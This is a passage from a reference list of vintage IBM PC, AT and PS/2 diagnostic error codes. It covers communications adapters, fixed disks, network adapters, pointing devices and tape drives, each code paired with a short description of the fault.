  1520 8273 Port A error
  1521 8273 command/read timeout
  1522 Interrupt level 4 failure
  1523 Ring Indicate stuck on
  1524 Receive clock stuck on
  1525 Transmit clock stuck on
  1526 Test indicate stuck on
  1527 Ring indicate not on
  1528 Receive clock not on
  1529 Transmit clock not on
  1530 Test indicate not on
  1531 Data set ready not on
  1532 Carrier detect not on
  1533 Clear to send not on
  1534 Data set ready stuck on
  1536 Clear to send stuck on
  1537 Level 3 interrupt failure
  1538 Receive interrupt results error
  1539 Wrap data miscompare
  1540 DMA channel 1 error
  1541 DMA channel 1 error
  1542 Error in 8273 error checking or status reporting
  1547 Stray interrupt level 4
  1548 Stray interrupt level 3
  1549 Interrupt presentation sequence timeout

16xx   Display Emulation Errors (327x, 5520, 525x)

17xx   Fixed Disk Errors
The following is a listing of Personal Computer AT Error Codes for the fixed disk drive and fixed disk drive adapter:

  1700 Fixed Disk/Adapter
  1701 HDD Controller Failure
  1702 Time out error
  1703 Seek error
  1704 Disk adapter error
  1705 No record found
  1706 Write fault error
  1707 Track 0 error
  1708 Head select error
  1709 Defective ECC
  1710 Read buffer overrun
  1711 Bad address mark
  1712 Error-cause not determined
  1713 Data compare error
  1714 Drive not ready
  1780 Disk 0 failure
  1781 Disk 1 failure
  1782 Disk adapter error
  1790 Disk 0 error
  1791 Disk 1 error

18xx   I/O Expansion Unit Errors
  1801 I/O expansion unit POST error
  1810 Enable/Disable failure
  1811 Extender card wrap test failed (disabled)
  1812 High order address lines failure (disabled)
  1813 Wait state failure (disabled)
  1814 Enable/Disable could not be set on
  1815 Wait state failure (disabled)
  1816 Extender card wrap test failed (enabled)
  1817 High order address lines failure (enabled)
  1818 Disable not functioning
  1819 Wait request switch not set correctly
  1820 Receiver card wrap test failure
  1821 Receiver high order address lines failure

19xx   3270 PC Attachment Card Errors

20xx   Binary Synchronous Communications (BSC) Adapter Errors
  2010 8255 Port A failure
  2011 8255 Port B failure
  2012 8255 Port C failure
  2013 8253 Timer 1 did not reach terminal count
  2014 8253 Timer 1 stuck on
  2016 8253 Timer 2 did not reach terminal count, or timer 2 stuck on
  2017 8251 Data set ready failed to come on
  2018 8251 Clear to send not sensed
  2019 8251 Data set ready stuck on
  2020 8251 Clear to send stuck on
  2021 8251 Hardware reset failed
  2022 8251 Software reset failed
  2023 8251 Software “error reset” failed
  2024 8251 Transmit ready did not come on
  2025 8251 Receive ready did not come on
  2026 8251 Could not force “overrun” error status
  2027 Interrupt failure – no timer interrupt
  2028 Interrupt failure – transmit, replace card or planar
  2029 Interrupt failure – transmit, replace card
  2030 Interrupt failure – receive, replace card or planar
  2031 Interrupt failure – receive, replace card
  2033 Ring indicate stuck on
  2034 Receive clock stuck on
  2035 Transmit clock stuck on
  2036 Test indicate stuck on
  2037 Ring indicate stuck on
  2038 Receive clock not on
  2039 Transmit clock not on
  2040 Test indicate not on
  2041 Data set ready not on
  2042 Carrier detect not on
  2043 Clear to send not on
  2044 Data set ready stuck on
  2045 Carrier detect stuck on
  2046 Clear to send stuck on
  2047 Unexpected transmit interrupt
  2048 Unexpected receive interrupt
  2049 Transmit data did not equal receive data
  2050 8251 detected overrun error
  2051 Lost data set ready during data wrap
  2052 Receive timeout during data wrap

21xx   Alternate Binary Synchronous Communications Adapter Errors
  2110 8255 Port A failure
  2111 8255 Port B failure
  2112 8255 Port C failure
  2113 8253 Timer 1 did not reach terminal count
  2114 8253 Timer 1 stuck on
  2115 8253 Timer 2 did not reach terminal count, or timer 2 stuck on
  2116 8251 Data set ready failed to come on
  2117 8251 Clear to send not sensed
  2118 8251 Data set ready stuck on
  2119 8251 Clear to send stuck on
  2120 8251 Hardware reset failed
  2121 8251 Software reset failed
  2122 8251 Software “error reset” failed
  2123 8251 Transmit ready did not come on
  2124 8251 Receive ready did not come on
  2125 8251 Could not force “overrun” error status
  2126 Interrupt failure – no timer interrupt
  2128 Interrupt failure – transmit, replace card or planar
  2129 Interrupt failure – transmit, replace card
  2130 Interrupt failure – receive, replace card or planar
  2131 Interrupt failure – receive, replace card
  2133 Ring indicate stuck on
  2134 Receive clock stuck on
  2135 Transmit clock stuck on
  2136 Test indicate stuck on
  2137 Ring indicate stuck on
  2138 Receive clock not on
  2139 Transmit clock not on
  2140 Test indicate not on
  2141 Data set ready not on
  2142 Carrier detect not on
  2143 Clear to send not on
  2144 Data set ready stuck on
  2145 Carrier detect stuck on
  2146 Clear to send stuck on
  2147 Unexpected transmit interrupt
  2148 Unexpected receive interrupt
  2149 Transmit data did not equal receive data
  2150 8251 detected overrun error
  2151 Lost data set ready during data wrap
  2152 Receive timeout during data wrap

22xx   Cluster Adapter Errors

24xx   Enhanced Graphics Adapter Errors

26xx   XT/370 Error Codes

27xx   XT/370 Error Codes

29xx   Color Matrix Printer Errors
  2901
  2902
  2904

30xx   Primary PC Network Adapter Errors
  3001 CPU Failure
  3002 ROM Failure
  3003 ID Failure
  3004 RAM Failure
  3005 HIC Failure
  3006 +/- 12v Failed
  3007 Digital Loopback Failure
  3008 Host Detected HIC Failure
  3009 Synchronous Fail & No Go Bit
  3010 HIC Test OK & No Go Bit
  3011 Go Bit & No CMD 41
  3012 Card not present
  3013 Digital Failure ( Fall Through )
  3015 Analog Failure
  3041 Hot Carrier (not this card)
  3042 Hot Carrier (This Card)

31xx   Secondary PC Network Adapter Errors
  3101 CPU Failure
  3102 ROM Failure
  3103 ID Failure
  3104 RAM Failure
  3105 HIC Failure
  3106 +/- 12v Failed
  3107 Digital Loopback Failure
  3108 Host Detected HIC Failure
  3109 Synchronous Fail & No Go Bit
  3110 HIC Test OK & No Go Bit
  3111 Go Bit & No CMD 41
  3112 Card not present
  3113 Digital Failure ( Fall Through )
  3115 Analog Failure
  3141 Hot Carrier (not this card)
  3142 Hot Carrier (THIS CARD !!)

33xx   Compact Printer Errors

74xx   Display Adapter 8514/A

850x   80286 Expanded Memory Adapter/A

851x   80286 Expanded Memory Adapter/A

852x   Memory Module Package on the 80286 Expanded Memory Adapter/A

860x   PS/2 Pointing Device Errors
   8601   Pointing device (IBM mouse)
   8602   Pointing device
   8603   System board error
   8604   System board : Pointing device

100xx  Multiprotocol Adapter/A
   10002  Multiprotocol Adapter/A any serial device
   10006  Multiprotocol Adapter/A any serial device
   10007  Communications cable Multiprotocol Adapter/A
   10008  Multiprotocol Adapter/A any serial device
   10009  Multiprotocol Adapter/A any serial device

101xx Modem Adapter/A
   10102  Modem Adapter/A any serial device
   10106  Modem Adapter/A any serial device
   10108  Modem Adapter/A any serial device
   10109  Modem Adapter/A any serial device

104xx Fixed Disk Adapter (ESDI) Drives 0 or 1 (C or D)
   10480  Fixed disk C, adapter (ESDI) or system board error
   10481  Fixed disk D, adapter (ESDI) or system board error
   10482  Fixed disk C or system board error
   10483  Fixed disk adapter (ESDI) or system board error
   10490  Fixed disk C or adapter (ESDI) error
   10491  Fixed disk C or adapter (ESDI) error

16500  6157 Tape Attachment Adapter

16520  6157 Streaming Tape Drive

16540  6157 Streaming Tape Drive or tape attachment adapter